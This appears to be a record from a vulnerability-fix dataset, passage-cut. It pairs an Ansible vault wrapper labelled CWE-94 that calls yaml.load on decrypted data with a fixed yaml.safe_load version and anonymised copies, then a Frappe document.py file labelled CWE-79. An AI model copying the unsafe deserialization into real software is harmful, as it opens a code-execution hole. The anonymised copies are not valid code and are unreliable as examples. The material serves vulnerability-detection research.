--advisement-border: orange;
--advisement-bg: #222218;
--advisement-VAR_17: var(--VAR_17);
--advisementheading-VAR_17: #f84;
--warning-border: red;
--warning-bg: hsla(40,100%,20%,0.95);
--warning-VAR_17: var(--VAR_17);
--amendment-border: #330099;
--amendment-bg: #080010;
--amendment-VAR_17: var(--VAR_17);
--amendmentheading-VAR_17: #cc00ff;
--def-border: #8ccbf2;
--def-bg: #080818;
--def-VAR_17: var(--VAR_17);
--defrow-border: #136;
--datacell-border: silver;
--indexinfo-VAR_17: #aaa;
--indextable-hover-VAR_17: var(--VAR_17);
--indextable-hover-bg: #181818;
--outdatedspec-bg: rgba(255, 255, 255, .5);
--outdatedspec-VAR_17: black;
--outdated-bg: maroon;
--outdated-VAR_17: white;
--outdated-shadow: red;
--editedrec-bg: darkorange;
}
/* In case a transparent-bg image doesn't expect to be on a dark bg,
which is quite common in practice... */
img { background: white; }
}"""
VAR_2 = """
/* This is a weird hack for me not yet following the commonmark spec
regarding paragraph and lists. */
[data-md] > :first-child {
margin-top: 0;
}
[data-md] > :last-child {
margin-bottom: 0;
}"""
VAR_3 = """
.css.css, .property.property, .descriptor.descriptor {
color: var(--a-normal-VAR_17);
font-size: inherit;
font-family: inherit;
}
.css::before, .property::before, .descriptor::before {
content: "‘";
}
.css::after, .property::after, .descriptor::after {
content: "’";
}
.property, .descriptor {
/* Don't wrap property and descriptor names */
white-space: nowrap;
}
.type { /* CSS value <type> */
font-style: italic;
}
pre .property::before, pre .property::after {
content: "";
}
[data-link-type="property"]::before,
[data-link-type="propdesc"]::before,
[data-link-type="descriptor"]::before,
[data-link-type="value"]::before,
[data-link-type="function"]::before,
[data-link-type="at-rule"]::before,
[data-link-type="selector"]::before,
[data-link-type="maybe"]::before {
content: "‘";
}
[data-link-type="property"]::after,
[data-link-type="propdesc"]::after,
[data-link-type="descriptor"]::after,
[data-link-type="value"]::after,
[data-link-type="function"]::after,
[data-link-type="at-rule"]::after,
[data-link-type="selector"]::after,
[data-link-type="maybe"]::after {
content: "’";
}
[data-link-type].production::before,
[data-link-type].production::after,
.prod [data-link-type]::before,
.prod [data-link-type]::after {
content: "";
}
[data-link-type=element],
[data-link-type=element-attr] {
font-family: Menlo, Consolas, "DejaVu Sans Mono", monospace;
font-size: .9em;
}
[data-link-type=element]::before { content: "<" }
[data-link-type=element]::after { content: ">" }
[data-link-type=biblio] {
white-space: pre;
}"""
VAR_4 = """
:root {
--selflink-VAR_17: white;
--selflink-bg: gray;
--selflink-hover-VAR_17: black;
}
.heading, .issue, .note, .example, li, dt {
position: relative;
}
a.self-link {
position: absolute;
top: 0;
left: calc(-1 * (3.5rem - 26px));
width: calc(3.5rem - 26px);
height: 2em;
VAR_17-align: center;
border: none;
transition: opacity .2s;
opacity: .5;
}
a.self-link:hover {
opacity: 1;
}
.heading > a.self-link {
font-size: 83%;
}
li > a.self-link {
left: calc(-1 * (3.5rem - 26px) - 2em);
}
dfn > a.self-link {
top: auto;
left: auto;
opacity: 0;
width: 1.5em;
height: 1.5em;
background: var(--selflink-bg);
color: var(--selflink-VAR_17);
font-style: normal;
transition: opacity .2s, background-color .2s, color .2s;
}
dfn:hover > a.self-link {
opacity: 1;
}
dfn > a.self-link:hover {
color: var(--selflink-hover-VAR_17);
}
a.self-link::before { content: "¶"; }
.heading > a.self-link::before { content: "§"; }
dfn > a.self-link::before { content: "#"; }
"""
VAR_1 += """
@media (prefers-color-scheme: dark) {
:root {
--selflink-VAR_17: black;
--selflink-bg: silver;
--selflink-hover-VAR_17: white;
}
}
"""
VAR_5 = """
body {
counter-reset: example figure issue;
}
.issue {
counter-increment: issue;
}
.issue:not(.no-marker)::before {
content: "Issue " counter(issue);
}
.example {
counter-increment: example;
}
.example:not(.no-marker)::before {
content: "Example " counter(example);
}
.invalid.example:not(.no-marker)::before,
.illegal.example:not(.no-marker)::before {
content: "Invalid Example" counter(example);
}
figcaption {
counter-increment: figure;
}
figcaption:not(.no-marker)::before {
content: "Figure " counter(figure) " ";
}"""
| [
6,
37,
38,
52,
70,
84,
112,
127,
129,
132,
137,
139,
145,
147,
149,
157,
174,
176,
180,
181,
184,
185,
193,
194,
196,
197,
201,
202,
209,
211,
241,
242,
268,
282,
283,
286,
289,
293,
305,
307,
309,
320,
323,
333,
353,
355,
370,
373,
380,
382,
386,
390,
395,
402,
404,
414,
415,
416,
440,
442,
443,
444,
445,
446,
451,
457,
459,
469,
476,
477,
488,
493,
497,
501,
503,
504,
506,
511,
514,
516,
520,
527,
532,
537,
539,
541,
543,
548,
556,
560,
565,
570,
576,
580,
585,
589,
594,
599,
601,
603,
606,
612,
615,
621,
623,
627,
634,
639,
644,
646,
648,
650,
655,
663,
665,
669,
674,
679,
685,
689,
694,
698,
703,
708,
710,
712,
715,
721,
728,
738,
781,
788,
796,
800,
847,
861,
862,
873,
884,
891,
479,
480,
481,
482,
483,
484,
485,
486,
487
] | [
6,
37,
38,
52,
70,
84,
112,
127,
129,
132,
137,
139,
145,
147,
149,
157,
174,
176,
180,
181,
184,
185,
193,
194,
196,
197,
201,
202,
209,
211,
241,
242,
268,
282,
283,
286,
289,
293,
305,
307,
309,
320,
323,
333,
353,
355,
370,
373,
380,
382,
386,
390,
395,
402,
404,
414,
415,
416,
440,
442,
443,
444,
445,
446,
451,
457,
459,
469,
476,
477,
488,
493,
497,
501,
503,
504,
506,
511,
514,
516,
520,
527,
532,
537,
539,
541,
543,
548,
556,
560,
565,
570,
576,
580,
585,
589,
594,
599,
601,
603,
606,
612,
615,
621,
623,
627,
634,
639,
644,
646,
648,
650,
655,
663,
665,
669,
674,
679,
685,
689,
694,
698,
703,
708,
710,
712,
715,
721,
728,
738,
781,
788,
796,
800,
847,
861,
862,
873,
884,
891,
479,
480,
481,
482,
483,
484,
485,
486,
487
] |
5CWE-94
| import yaml
try:
from ansible.utils.vault import VaultLib
except ImportError:
# Ansible 2.0 has changed the vault location
from ansible.parsing.vault import VaultLib
class Vault(object):
'''R/W an ansible-vault yaml file'''
def __init__(self, password):
self.password = password
self.vault = VaultLib(password)
def load(self, stream):
'''read vault steam and return python object'''
return yaml.load(self.vault.decrypt(stream))
def dump(self, data, stream=None):
'''encrypt data and print stdout or write to stream'''
yaml_text = yaml.dump(
data,
default_flow_style=False,
allow_unicode=True)
encrypted = self.vault.encrypt(yaml_text)
if stream:
stream.write(encrypted)
else:
return encrypted
| import yaml
try:
from ansible.utils.vault import VaultLib
except ImportError:
# Ansible 2.0 has changed the vault location
from ansible.parsing.vault import VaultLib
class Vault(object):
'''R/W an ansible-vault yaml file'''
def __init__(self, password):
self.password = password
self.vault = VaultLib(password)
def load(self, stream):
'''read vault steam and return python object'''
return yaml.safe_load(self.vault.decrypt(stream))
def dump(self, data, stream=None):
'''encrypt data and print stdout or write to stream'''
yaml_text = yaml.dump(
data,
default_flow_style=False,
allow_unicode=True)
encrypted = self.vault.encrypt(yaml_text)
if stream:
stream.write(encrypted)
else:
return encrypted
| remote_code_execution | {
"code": [
" return yaml.load(self.vault.decrypt(stream))"
],
"line_no": [
18
]
} | {
"code": [
" return yaml.safe_load(self.vault.decrypt(stream))"
],
"line_no": [
18
]
} | import yaml
try:
from ansible.utils.vault import .VaultLib
except ImportError:
from ansible.parsing.vault import .VaultLib
class CLASS_0(object):
def __init__(self, VAR_0):
self.password = VAR_0
self.vault = VaultLib(VAR_0)
def FUNC_0(self, VAR_1):
return yaml.load(self.vault.decrypt(VAR_1))
def FUNC_1(self, VAR_2, VAR_1=None):
VAR_3 = yaml.dump(
VAR_2,
default_flow_style=False,
allow_unicode=True)
VAR_4 = self.vault.encrypt(VAR_3)
if VAR_1:
stream.write(VAR_4)
else:
return VAR_4
| import yaml
try:
from ansible.utils.vault import .VaultLib
except ImportError:
from ansible.parsing.vault import .VaultLib
class CLASS_0(object):
def __init__(self, VAR_0):
self.password = VAR_0
self.vault = VaultLib(VAR_0)
def FUNC_0(self, VAR_1):
return yaml.safe_load(self.vault.decrypt(VAR_1))
def FUNC_1(self, VAR_2, VAR_1=None):
VAR_3 = yaml.dump(
VAR_2,
default_flow_style=False,
allow_unicode=True)
VAR_4 = self.vault.encrypt(VAR_3)
if VAR_1:
stream.write(VAR_4)
else:
return VAR_4
| [
5,
7,
8,
11,
15,
19,
31,
10,
17,
21
] | [
5,
7,
8,
11,
15,
19,
31,
10,
17,
21
] |
1CWE-79
| # Copyright (c) 2015, Frappe Technologies Pvt. Ltd. and Contributors
# MIT License. See license.txt
from __future__ import unicode_literals, print_function
import frappe
import time
from frappe import _, msgprint
from frappe.utils import flt, cstr, now, get_datetime_str, file_lock, date_diff
from frappe.model.base_document import BaseDocument, get_controller
from frappe.model.naming import set_new_name
from six import iteritems, string_types
from werkzeug.exceptions import NotFound, Forbidden
import hashlib, json
from frappe.model import optional_fields, table_fields
from frappe.model.workflow import validate_workflow
from frappe.model.workflow import set_workflow_state_on_action
from frappe.utils.global_search import update_global_search
from frappe.integrations.doctype.webhook import run_webhooks
from frappe.desk.form.document_follow import follow_document
from frappe.core.doctype.server_script.server_script_utils import run_server_script_for_doc_event
# once_only validation
# methods
def get_doc(*args, **kwargs):
"""returns a frappe.model.Document object.
:param arg1: Document dict or DocType name.
:param arg2: [optional] document name.
:param for_update: [optional] select document for update.
There are multiple ways to call `get_doc`
# will fetch the latest user object (with child table) from the database
user = get_doc("User", "test@example.com")
# create a new object
user = get_doc({
"doctype":"User"
"email_id": "test@example.com",
"roles: [
{"role": "System Manager"}
]
})
# create new object with keyword arguments
user = get_doc(doctype='User', email_id='test@example.com')
# select a document for update
user = get_doc("User", "test@example.com", for_update=True)
"""
if args:
if isinstance(args[0], BaseDocument):
# already a document
return args[0]
elif isinstance(args[0], string_types):
doctype = args[0]
elif isinstance(args[0], dict):
# passed a dict
kwargs = args[0]
else:
raise ValueError('First non keyword argument must be a string or dict')
if len(args) < 2 and kwargs:
if 'doctype' in kwargs:
doctype = kwargs['doctype']
else:
raise ValueError('"doctype" is a required key')
controller = get_controller(doctype)
if controller:
return controller(*args, **kwargs)
raise ImportError(doctype)
class Document(BaseDocument):
"""All controllers inherit from `Document`."""
def __init__(self, *args, **kwargs):
"""Constructor.
:param arg1: DocType name as string or document **dict**
:param arg2: Document name, if `arg1` is DocType name.
If DocType name and document name are passed, the object will load
all values (including child documents) from the database.
"""
self.doctype = self.name = None
self._default_new_docs = {}
self.flags = frappe._dict()
if args and args[0] and isinstance(args[0], string_types):
# first arugment is doctype
if len(args)==1:
# single
self.doctype = self.name = args[0]
else:
self.doctype = args[0]
if isinstance(args[1], dict):
# filter
self.name = frappe.db.get_value(args[0], args[1], "name")
if self.name is None:
frappe.throw(_("{0} {1} not found").format(_(args[0]), args[1]),
frappe.DoesNotExistError)
else:
self.name = args[1]
if 'for_update' in kwargs:
self.flags.for_update = kwargs.get('for_update')
self.load_from_db()
return
if args and args[0] and isinstance(args[0], dict):
# first argument is a dict
kwargs = args[0]
if kwargs:
# init base document
super(Document, self).__init__(kwargs)
self.init_valid_columns()
else:
# incorrect arguments. let's not proceed.
raise ValueError('Illegal arguments')
@staticmethod
def whitelist(f):
"""Decorator: Whitelist method to be called remotely via REST API."""
f.whitelisted = True
return f
def reload(self):
"""Reload document from database"""
self.load_from_db()
def load_from_db(self):
"""Load document and children from database and create properties
from fields"""
if not getattr(self, "_metaclass", False) and self.meta.issingle:
single_doc = frappe.db.get_singles_dict(self.doctype)
if not single_doc:
single_doc = frappe.new_doc(self.doctype).as_dict()
single_doc["name"] = self.doctype
del single_doc["__islocal"]
super(Document, self).__init__(single_doc)
self.init_valid_columns()
self._fix_numeric_types()
else:
d = frappe.db.get_value(self.doctype, self.name, "*", as_dict=1, for_update=self.flags.for_update)
if not d:
frappe.throw(_("{0} {1} not found").format(_(self.doctype), self.name), frappe.DoesNotExistError)
super(Document, self).__init__(d)
if self.name=="DocType" and self.doctype=="DocType":
from frappe.model.meta import DOCTYPE_TABLE_FIELDS
table_fields = DOCTYPE_TABLE_FIELDS
else:
table_fields = self.meta.get_table_fields()
for df in table_fields:
children = frappe.db.get_values(df.options,
{"parent": self.name, "parenttype": self.doctype, "parentfield": df.fieldname},
"*", as_dict=True, order_by="idx asc")
if children:
self.set(df.fieldname, children)
else:
self.set(df.fieldname, [])
# sometimes __setup__ can depend on child values, hence calling again at the end
if hasattr(self, "__setup__"):
self.__setup__()
def get_latest(self):
if not getattr(self, "latest", None):
self.latest = frappe.get_doc(self.doctype, self.name)
return self.latest
def check_permission(self, permtype='read', permlevel=None):
"""Raise `frappe.PermissionError` if not permitted"""
if not self.has_permission(permtype):
self.raise_no_permission_to(permlevel or permtype)
def has_permission(self, permtype="read", verbose=False):
"""Call `frappe.has_permission` if `self.flags.ignore_permissions`
is not set.
:param permtype: one of `read`, `write`, `submit`, `cancel`, `delete`"""
if self.flags.ignore_permissions:
return True
return frappe.has_permission(self.doctype, permtype, self, verbose=verbose)
def raise_no_permission_to(self, perm_type):
"""Raise `frappe.PermissionError`."""
frappe.flags.error_message = _('Insufficient Permission for {0}').format(self.doctype)
raise frappe.PermissionError
def insert(self, ignore_permissions=None, ignore_links=None, ignore_if_duplicate=False,
ignore_mandatory=None, set_name=None, set_child_names=True):
"""Insert the document in the database (as a new document).
This will check for user permissions and execute `before_insert`,
`validate`, `on_update`, `after_insert` methods if they are written.
:param ignore_permissions: Do not check permissions if True."""
if self.flags.in_print:
return
self.flags.notifications_executed = []
if ignore_permissions!=None:
self.flags.ignore_permissions = ignore_permissions
if ignore_links!=None:
self.flags.ignore_links = ignore_links
if ignore_mandatory!=None:
self.flags.ignore_mandatory = ignore_mandatory
self.set("__islocal", True)
self.check_permission("create")
self._set_defaults()
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.run_method("before_insert")
self._validate_links()
self.set_new_name(set_name=set_name, set_child_names=set_child_names)
self.set_parent_in_children()
self.validate_higher_perm_levels()
self.flags.in_insert = True
self.run_before_save_methods()
self._validate()
self.set_docstatus()
self.flags.in_insert = False
# run validate, on update etc.
# parent
if getattr(self.meta, "issingle", 0):
self.update_single(self.get_valid_dict())
else:
try:
self.db_insert()
except frappe.DuplicateEntryError as e:
if not ignore_if_duplicate:
raise e
# children
for d in self.get_all_children():
d.db_insert()
self.run_method("after_insert")
self.flags.in_insert = True
if self.get("amended_from"):
self.copy_attachments_from_amended_from()
# flag to prevent creation of event update log for create and update both
# during document creation
self.flags.update_log_for_doc_creation = True
self.run_post_save_methods()
self.flags.in_insert = False
# delete __islocal
if hasattr(self, "__islocal"):
delattr(self, "__islocal")
# clear unsaved flag
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
if not (frappe.flags.in_migrate or frappe.local.flags.in_install or frappe.flags.in_setup_wizard):
follow_document(self.doctype, self.name, frappe.session.user)
return self
def save(self, *args, **kwargs):
"""Wrapper for _save"""
return self._save(*args, **kwargs)
def _save(self, ignore_permissions=None, ignore_version=None):
"""Save the current document in the database in the **DocType**'s table or
`tabSingles` (for single types).
This will check for user permissions and execute
`validate` before updating, `on_update` after updating triggers.
:param ignore_permissions: Do not check permissions if True.
:param ignore_version: Do not save version if True."""
if self.flags.in_print:
return
self.flags.notifications_executed = []
if ignore_permissions!=None:
self.flags.ignore_permissions = ignore_permissions
self.flags.ignore_version = frappe.flags.in_test if ignore_version is None else ignore_version
if self.get("__islocal") or not self.get("name"):
self.insert()
return
self.check_permission("write", "save")
self.set_user_and_timestamp()
self.set_docstatus()
self.check_if_latest()
self.set_parent_in_children()
self.set_name_in_children()
self.validate_higher_perm_levels()
self._validate_links()
self.run_before_save_methods()
if self._action != "cancel":
self._validate()
if self._action == "update_after_submit":
self.validate_update_after_submit()
self.set_docstatus()
# parent
if self.meta.issingle:
self.update_single(self.get_valid_dict())
else:
self.db_update()
self.update_children()
self.run_post_save_methods()
# clear unsaved flag
if hasattr(self, "__unsaved"):
delattr(self, "__unsaved")
return self
def copy_attachments_from_amended_from(self):
"""Copy attachments from `amended_from`"""
from frappe.desk.form.load import get_attachments
#loop through attachments
for attach_item in get_attachments(self.doctype, self.amended_from):
#save attachments to new doc
_file = frappe.get_doc({
"doctype": "File",
"file_url": attach_item.file_url,
"file_name": attach_item.file_name,
"attached_to_name": self.name,
"attached_to_doctype": self.doctype,
"folder": "Home/Attachments"})
_file.save()
def update_children(self):
"""update child tables"""
for df in self.meta.get_table_fields():
self.update_child_table(df.fieldname, df)
def update_child_table(self, fieldname, df=None):
"""sync child table for given fieldname"""
rows = []
if not df:
df = self.meta.get_field(fieldname)
for d in self.get(df.fieldname):
d.db_update()
rows.append(d.name)
if df.options in (self.flags.ignore_children_type or []):
# do not delete rows for this because of flags
# hack for docperm :(
return
if rows:
# select rows that do not match the ones in the document
deleted_rows = frappe.db.sql("""select name from `tab{0}` where parent=%s
and parenttype=%s and parentfield=%s
and name not in ({1})""".format(df.options, ','.join(['%s'] * len(rows))),
[self.name, self.doctype, fieldname] + rows)
if len(deleted_rows) > 0:
# delete rows that do not match the ones in the document
frappe.db.sql("""delete from `tab{0}` where name in ({1})""".format(df.options,
','.join(['%s'] * len(deleted_rows))), tuple(row[0] for row in deleted_rows))
else:
# no rows found, delete all rows
frappe.db.sql("""delete from `tab{0}` where parent=%s
and parenttype=%s and parentfield=%s""".format(df.options),
(self.name, self.doctype, fieldname))
def get_doc_before_save(self):
return getattr(self, '_doc_before_save', None)
def has_value_changed(self, fieldname):
'''Returns true if value is changed before and after saving'''
previous = self.get_doc_before_save()
return previous.get(fieldname)!=self.get(fieldname) if previous else True
def set_new_name(self, force=False, set_name=None, set_child_names=True):
"""Calls `frappe.naming.set_new_name` for parent and child docs."""
if self.flags.name_set and not force:
return
# If autoname has set as Prompt (name)
if self.get("__newname"):
self.name = self.get("__newname")
self.flags.name_set = True
return
if set_name:
self.name = set_name
else:
set_new_name(self)
if set_child_names:
# set name for children
for d in self.get_all_children():
set_new_name(d)
self.flags.name_set = True
def get_title(self):
"""Get the document title based on title_field or `title` or `name`"""
return self.get(self.meta.get_title_field())
def set_title_field(self):
"""Set title field based on template"""
def get_values():
values = self.as_dict()
# format values
for key, value in iteritems(values):
if value==None:
values[key] = ""
return values
if self.meta.get("title_field")=="title":
df = self.meta.get_field(self.meta.title_field)
if df.options:
self.set(df.fieldname, df.options.format(**get_values()))
elif self.is_new() and not self.get(df.fieldname) and df.default:
# set default title for new transactions (if default)
self.set(df.fieldname, df.default.format(**get_values()))
def update_single(self, d):
"""Updates values for Single type Document in `tabSingles`."""
frappe.db.sql("""delete from `tabSingles` where doctype=%s""", self.doctype)
for field, value in iteritems(d):
if field != "doctype":
frappe.db.sql("""insert into `tabSingles` (doctype, field, value)
values (%s, %s, %s)""", (self.doctype, field, value))
if self.doctype in frappe.db.value_cache:
del frappe.db.value_cache[self.doctype]
def set_user_and_timestamp(self):
self._original_modified = self.modified
self.modified = now()
self.modified_by = frappe.session.user
if not self.creation:
self.creation = self.modified
if not self.owner:
self.owner = self.modified_by
for d in self.get_all_children():
d.modified = self.modified
d.modified_by = self.modified_by
if not d.owner:
d.owner = self.owner
if not d.creation:
d.creation = self.creation
frappe.flags.currently_saving.append((self.doctype, self.name))
def set_docstatus(self):
if self.docstatus==None:
self.docstatus=0
for d in self.get_all_children():
d.docstatus = self.docstatus
def _validate(self):
self._validate_mandatory()
self._validate_data_fields()
self._validate_selects()
self._validate_non_negative()
self._validate_length()
self._extract_images_from_text_editor()
self._sanitize_content()
self._save_passwords()
self.validate_workflow()
children = self.get_all_children()
for d in children:
d._validate_data_fields()
d._validate_selects()
d._validate_non_negative()
d._validate_length()
d._extract_images_from_text_editor()
d._sanitize_content()
d._save_passwords()
if self.is_new():
# don't set fields like _assign, _comments for new doc
for fieldname in optional_fields:
self.set(fieldname, None)
else:
self.validate_set_only_once()
def _validate_non_negative(self):
def get_msg(df):
if self.parentfield:
return "{} {} #{}: {} {}".format(frappe.bold(_(self.doctype)),
_("Row"), self.idx, _("Value cannot be negative for"), frappe.bold(_(df.label)))
else:
return _("Value cannot be negative for {0}: {1}").format(_(df.parent), frappe.bold(_(df.label)))
for df in self.meta.get('fields', {'non_negative': ('=', 1),
'fieldtype': ('in', ['Int', 'Float', 'Currency'])}):
if flt(self.get(df.fieldname)) < 0:
msg = get_msg(df)
frappe.throw(msg, frappe.NonNegativeError, title=_("Negative Value"))
def validate_workflow(self):
"""Validate if the workflow transition is valid"""
if frappe.flags.in_install == 'frappe': return
workflow = self.meta.get_workflow()
if workflow:
validate_workflow(self)
if not self._action == 'save':
set_workflow_state_on_action(self, workflow, self._action)
def validate_set_only_once(self):
"""Validate that fields are not changed if not in insert"""
set_only_once_fields = self.meta.get_set_only_once_fields()
if set_only_once_fields and self._doc_before_save:
# document exists before saving
for field in set_only_once_fields:
fail = False
value = self.get(field.fieldname)
original_value = self._doc_before_save.get(field.fieldname)
if field.fieldtype in table_fields:
fail = not self.is_child_table_same(field.fieldname)
elif field.fieldtype in ('Date', 'Datetime', 'Time'):
fail = str(value) != str(original_value)
else:
fail = value != original_value
if fail:
frappe.throw(_("Value cannot be changed for {0}").format(self.meta.get_label(field.fieldname)),
frappe.CannotChangeConstantError)
return False
def is_child_table_same(self, fieldname):
"""Validate child table is same as original table before saving"""
value = self.get(fieldname)
original_value = self._doc_before_save.get(fieldname)
same = True
if len(original_value) != len(value):
same = False
else:
# check all child entries
for i, d in enumerate(original_value):
new_child = value[i].as_dict(convert_dates_to_str = True)
original_child = d.as_dict(convert_dates_to_str = True)
# all fields must be same other than modified and modified_by
for key in ('modified', 'modified_by', 'creation'):
del new_child[key]
del original_child[key]
if original_child != new_child:
same = False
break
return same
def apply_fieldlevel_read_permissions(self):
"""Remove values the user is not allowed to read (called when loading in desk)"""
if frappe.session.user == "Administrator":
return
has_higher_permlevel = False
all_fields = self.meta.fields.copy()
for table_field in self.meta.get_table_fields():
all_fields += frappe.get_meta(table_field.options).fields or []
for df in all_fields:
if df.permlevel > 0:
has_higher_permlevel = True
break
if not has_higher_permlevel:
return
has_access_to = self.get_permlevel_access('read')
for df in self.meta.fields:
if df.permlevel and not df.permlevel in has_access_to:
self.set(df.fieldname, None)
for table_field in self.meta.get_table_fields():
for df in frappe.get_meta(table_field.options).fields or []:
if df.permlevel and not df.permlevel in has_access_to:
for child in self.get(table_field.fieldname) or []:
child.set(df.fieldname, None)
def validate_higher_perm_levels(self):
"""If the user does not have permissions at permlevel > 0, then reset the values to original / default"""
if self.flags.ignore_permissions or frappe.flags.in_install:
return
if frappe.session.user == "Administrator":
return
has_access_to = self.get_permlevel_access()
high_permlevel_fields = self.meta.get_high_permlevel_fields()
if high_permlevel_fields:
self.reset_values_if_no_permlevel_access(has_access_to, high_permlevel_fields)
# If new record then don't reset the values for child table
if self.is_new(): return
# check for child tables
for df in self.meta.get_table_fields():
high_permlevel_fields = frappe.get_meta(df.options).get_high_permlevel_fields()
if high_permlevel_fields:
for d in self.get(df.fieldname):
d.reset_values_if_no_permlevel_access(has_access_to, high_permlevel_fields)
def get_permlevel_access(self, permission_type='write'):
if not hasattr(self, "_has_access_to"):
self._has_access_to = {}
self._has_access_to[permission_type] = []
roles = frappe.get_roles()
for perm in self.get_permissions():
if perm.role in roles and perm.get(permission_type):
if perm.permlevel not in self._has_access_to[permission_type]:
self._has_access_to[permission_type].append(perm.permlevel)
return self._has_access_to[permission_type]
def has_permlevel_access_to(self, fieldname, df=None, permission_type='read'):
if not df:
df = self.meta.get_field(fieldname)
return df.permlevel in self.get_permlevel_access(permission_type)
def get_permissions(self):
if self.meta.istable:
# use parent permissions
permissions = frappe.get_meta(self.parenttype).permissions
else:
permissions = self.meta.permissions
return permissions
def _set_defaults(self):
if frappe.flags.in_import:
return
new_doc = frappe.new_doc(self.doctype, as_dict=True)
self.update_if_missing(new_doc)
# children
for df in self.meta.get_table_fields():
new_doc = frappe.new_doc(df.options, as_dict=True)
value = self.get(df.fieldname)
if isinstance(value, list):
for d in value:
d.update_if_missing(new_doc)
def check_if_latest(self):
"""Checks if `modified` timestamp provided by document being updated is same as the
`modified` timestamp in the database. If there is a different, the document has been
updated in the database after the current copy was read. Will throw an error if
timestamps don't match.
Will also validate document transitions (Save > Submit > Cancel) calling
`self.check_docstatus_transition`."""
conflict = False
self._action = "save"
if not self.get('__islocal'):
if self.meta.issingle:
modified = frappe.db.sql("""select value from tabSingles
where doctype=%s and field='modified' for update""", self.doctype)
modified = modified and modified[0][0]
if modified and modified != cstr(self._original_modified):
conflict = True
else:
tmp = frappe.db.sql("""select modified, docstatus from `tab{0}`
where name = %s for update""".format(self.doctype), self.name, as_dict=True)
if not tmp:
frappe.throw(_("Record does not exist"))
else:
tmp = tmp[0]
modified = cstr(tmp.modified)
if modified and modified != cstr(self._original_modified):
conflict = True
self.check_docstatus_transition(tmp.docstatus)
if conflict:
frappe.msgprint(_("Error: Document has been modified after you have opened it") \
+ (" (%s, %s). " % (modified, self.modified)) \
+ _("Please refresh to get the latest document."),
raise_exception=frappe.TimestampMismatchError)
else:
self.check_docstatus_transition(0)
def check_docstatus_transition(self, docstatus):
"""Ensures valid `docstatus` transition.
Valid transitions are (number in brackets is `docstatus`):
- Save (0) > Save (0)
- Save (0) > Submit (1)
- Submit (1) > Submit (1)
- Submit (1) > Cancel (2)
"""
if not self.docstatus:
self.docstatus = 0
if docstatus==0:
if self.docstatus==0:
self._action = "save"
elif self.docstatus==1:
self._action = "submit"
self.check_permission("submit")
else:
raise frappe.DocstatusTransitionError(_("Cannot change docstatus from 0 to 2"))
elif docstatus==1:
if self.docstatus==1:
self._action = "update_after_submit"
self.check_permission("submit")
elif self.docstatus==2:
self._action = "cancel"
self.check_permission("cancel")
else:
raise frappe.DocstatusTransitionError(_("Cannot change docstatus from 1 to 0"))
elif docstatus==2:
raise frappe.ValidationError(_("Cannot edit cancelled document"))
def set_parent_in_children(self):
"""Updates `parent` and `parenttype` property in all children."""
for d in self.get_all_children():
d.parent = self.name
d.parenttype = self.doctype
def set_name_in_children(self):
# Set name for any new children
for d in self.get_all_children():
if not d.name:
set_new_name(d)
def validate_update_after_submit(self):
if self.flags.ignore_validate_update_after_submit:
return
self._validate_update_after_submit()
for d in self.get_all_children():
if d.is_new() and self.meta.get_field(d.parentfield).allow_on_submit:
# in case of a new row, don't validate allow on submit, if table is allow on submit
continue
d._validate_update_after_submit()
# TODO check only allowed values are updated
def _validate_mandatory(self):
if self.flags.ignore_mandatory:
return
missing = self._get_missing_mandatory_fields()
for d in self.get_all_children():
missing.extend(d._get_missing_mandatory_fields())
if not missing:
return
for fieldname, msg in missing:
msgprint(msg)
if frappe.flags.print_messages:
print(self.as_json().encode("utf-8"))
raise frappe.MandatoryError('[{doctype}, {name}]: {fields}'.format(
fields=", ".join((each[0] for each in missing)),
doctype=self.doctype,
name=self.name))
def _validate_links(self):
if self.flags.ignore_links or self._action == "cancel":
return
invalid_links, cancelled_links = self.get_invalid_links()
for d in self.get_all_children():
result = d.get_invalid_links(is_submittable=self.meta.is_submittable)
invalid_links.extend(result[0])
cancelled_links.extend(result[1])
if invalid_links:
msg = ", ".join((each[2] for each in invalid_links))
frappe.throw(_("Could not find {0}").format(msg),
frappe.LinkValidationError)
if cancelled_links:
msg = ", ".join((each[2] for each in cancelled_links))
frappe.throw(_("Cannot link cancelled document: {0}").format(msg),
frappe.CancelledLinkError)
def get_all_children(self, parenttype=None):
"""Returns all children documents from **Table** type field in a list."""
ret = []
for df in self.meta.get("fields", {"fieldtype": ['in', table_fields]}):
if parenttype:
if df.options==parenttype:
return self.get(df.fieldname)
value = self.get(df.fieldname)
if isinstance(value, list):
ret.extend(value)
return ret
	def run_method(self, method, *args, **kwargs):
		"""Run the controller method `method` plus any hooks registered for it,
		then fire notifications, webhooks and server scripts for the event.
		Returns the (collated) return value of the method and its hooks."""
		if "flags" in kwargs:
			# `flags` is reserved; never forward it to the controller method
			del kwargs["flags"]
		if hasattr(self, method) and hasattr(getattr(self, method), "__call__"):
			fn = lambda self, *args, **kwargs: getattr(self, method)(*args, **kwargs)
		else:
			# hack! to run hooks even if method does not exist
			fn = lambda self, *args, **kwargs: None
		# hook() looks up doc_events by the function's __name__
		fn.__name__ = str(method)
		out = Document.hook(fn)(self, *args, **kwargs)
		self.run_notifications(method)
		run_webhooks(self, method)
		run_server_script_for_doc_event(self, method)
		return out
	def run_trigger(self, method, *args, **kwargs):
		"""Alias for `run_method`."""
		return self.run_method(method, *args, **kwargs)
def run_notifications(self, method):
"""Run notifications for this method"""
if (frappe.flags.in_import and frappe.flags.mute_emails) or frappe.flags.in_patch or frappe.flags.in_install:
return
if self.flags.notifications_executed==None:
self.flags.notifications_executed = []
from frappe.email.doctype.notification.notification import evaluate_alert
if self.flags.notifications == None:
alerts = frappe.cache().hget('notifications', self.doctype)
if alerts==None:
alerts = frappe.get_all('Notification', fields=['name', 'event', 'method'],
filters={'enabled': 1, 'document_type': self.doctype})
frappe.cache().hset('notifications', self.doctype, alerts)
self.flags.notifications = alerts
if not self.flags.notifications:
return
def _evaluate_alert(alert):
if not alert.name in self.flags.notifications_executed:
evaluate_alert(self, alert.name, alert.event)
self.flags.notifications_executed.append(alert.name)
event_map = {
"on_update": "Save",
"after_insert": "New",
"on_submit": "Submit",
"on_cancel": "Cancel"
}
if not self.flags.in_insert:
# value change is not applicable in insert
event_map['on_change'] = 'Value Change'
for alert in self.flags.notifications:
event = event_map.get(method, None)
if event and alert.event == event:
_evaluate_alert(alert)
elif alert.event=='Method' and method == alert.method:
_evaluate_alert(alert)
	# `whitelist.__func__` unwraps the staticmethod object, which is not yet
	# callable as a decorator inside the class body
	@whitelist.__func__
	def _submit(self):
		"""Submit the document. Sets `docstatus` = 1, then saves."""
		self.docstatus = 1
		self.save()
